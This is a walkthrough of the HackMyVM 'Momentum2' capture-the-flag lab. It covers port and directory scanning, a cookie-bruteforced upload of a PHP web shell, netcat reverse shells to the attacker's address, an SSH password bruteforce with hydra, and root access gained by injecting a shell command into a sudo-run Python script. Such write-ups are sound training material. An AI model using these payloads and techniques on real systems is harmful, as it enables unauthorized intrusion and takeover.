HackMyVm Momentum2 Walkthrough
https://hackmyvm.eu/machines/machine.php?vm=Momentum2
Scan ports.
nmap -sV -sC -p- 192.168.56.99 -oN ports.log sudo-0 | 0 [15:05:51]
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-31 15:05 CST
Nmap scan report for localhost (192.168.56.99)
Host is up (0.0013s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 02:32:8e:5b:27:a8:ea:f2:fe:11:db:2f:57:f4:11:7e (RSA)
| 256 74:35:c8:fb:96:c1:9f:a0:dc:73:6c:cd:83:52:bf:b7 (ECDSA)
|_ 256 fc:4a:70:fb:b9:7d:32:89:35:0a:45:3d:d9:8b:c5:95 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Momentum 2 | Index
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelScan port 80.
gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log
===============================================================
/index.html (Status: 200) [Size: 1428]
/img (Status: 301) [Size: 314] [--> http://192.168.56.100/img/]
/css (Status: 301) [Size: 314] [--> http://192.168.56.100/css/]
/ajax.php.bak (Status: 200) [Size: 357]
/ajax.php (Status: 200) [Size: 0]
/manual (Status: 301) [Size: 317] [--> http://192.168.56.100/manual/]
/js (Status: 301) [Size: 313] [--> http://192.168.56.100/js/]
/dashboard.html (Status: 200) [Size: 513]
/owls (Status: 301) [Size: 315] [--> http://192.168.56.100/owls/]Check ajax.php.bak. We need to set some parameter to upload php file.
cat ajax.php.bak
//The boss told me to add one more Upper Case letter at the end of the cookie
if(isset($_COOKIE['admin']) && $_COOKIE['admin'] == '&G6u@B6uDXMq&Ms'){
//[+] Add if $_POST['secure'] == 'val1d'
$valid_ext = array("pdf","php","txt");
}
else{
$valid_ext = array("txt");
}
// Remember success upload returns 1 ⏎ Generate dic file of cookies.
for c in {A..Z}; do echo '&G6u@B6uDXMq&Ms'$c >> cookie.txt; done
Create cmd.php with shell code in it.
cat cmd.php fish-0 | 0 [21:02:13]
<?php
system($_GET["cmd"])
?>Go to /dashboard.html, choose cmd.php, click upload, and capture the request with burpsuite.
[image-20210531210127178.png]
Send the request to Repeater, add cookie "admin=xxx", which we will bruteforce later, and add parameter "secure=val1d". Take care, it's not valid. If we click send now, response code will be 0, which means failed.
[image-20210531212540903.png]
Then send it to intruder, add §§ sign to admin=§xxxxx§.
[image-20210531213130392.png]
Set payload as cookie.txt we just generated.
image-20210531213158667 [image-20210531213158667.png]
Click start attack. Then we get the right cookie with response code 1.
[image-20210531213313743.png]
And cmd.php has been uploaded to /owls.
[image-20210531213353093.png]
Check if cmd.php works OK.
~ curl 'http://192.168.56.99/owls/cmd.php?cmd=id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)We can get reverse shell.
curl 'http://192.168.56.99/owls/cmd.php?cmd=nc%20192.168.56.150%201234%20-e%20/bin/bash'
-------------------------------------------------------------------------------------------------------
nc -nlvp 1234 fish-0 | 130 [15:44:34]
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.99.
Ncat: Connection from 192.168.56.99:37994.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)In athena's home folder, found password hint.
www-data@momentum2:/home/athena$ cat password-reminder.txt
cat password-reminder.txt
password : myvulnerableapp[Asterisk]Asterisk mark (*) means any character, we generate a dic.
```
crunch 16 16 -t myvulnerableapp@ > dic.txt
crunch 16 16 -t myvulnerableapp% >> dic.txt
crunch 16 16 -t myvulnerableapp, >> dic.txt
crunch 16 16 -t myvulnerableapp^ >> dic.txt
Bruteforce ssh with user name athena and this dic.
hydra -l athena -P dic.txt 192.168.56.99 ssh -f fish-0 | 0 [15:25:54]
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-05-31 15:26:17
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 95 login tries (l:1/p:95), ~6 tries per task
[DATA] attacking ssh://192.168.56.99:22/
[22][ssh] host: 192.168.56.99 login: athena password: myvulnerableapp*
Ssh login as athena, check sudo.
athena@momentum2:~$ sudo -l
Matching Defaults entries for athena on momentum2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User athena may run the following commands on momentum2:
(root) NOPASSWD: /usr/bin/python3 /home/team-tasks/cookie-gen.py
Run the py file, when asked for input seed, input shell code.
sudo python3 /home/team-tasks/cookie-gen.py
~ Random Cookie Generation ~
[!] for security reasons we keep logs about cookie seeds.
Enter the seed : ;nc 192.168.56.150 1234 -e /bin/sh;
Listen to the port just input at another terminal, and get root shell.
nc -nvlp 1234 man-0 | 0 [15:32:06]
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.99.
Ncat: Connection from 192.168.56.99:37992.
id
uid=0(root) gid=0(root) groups=0(root)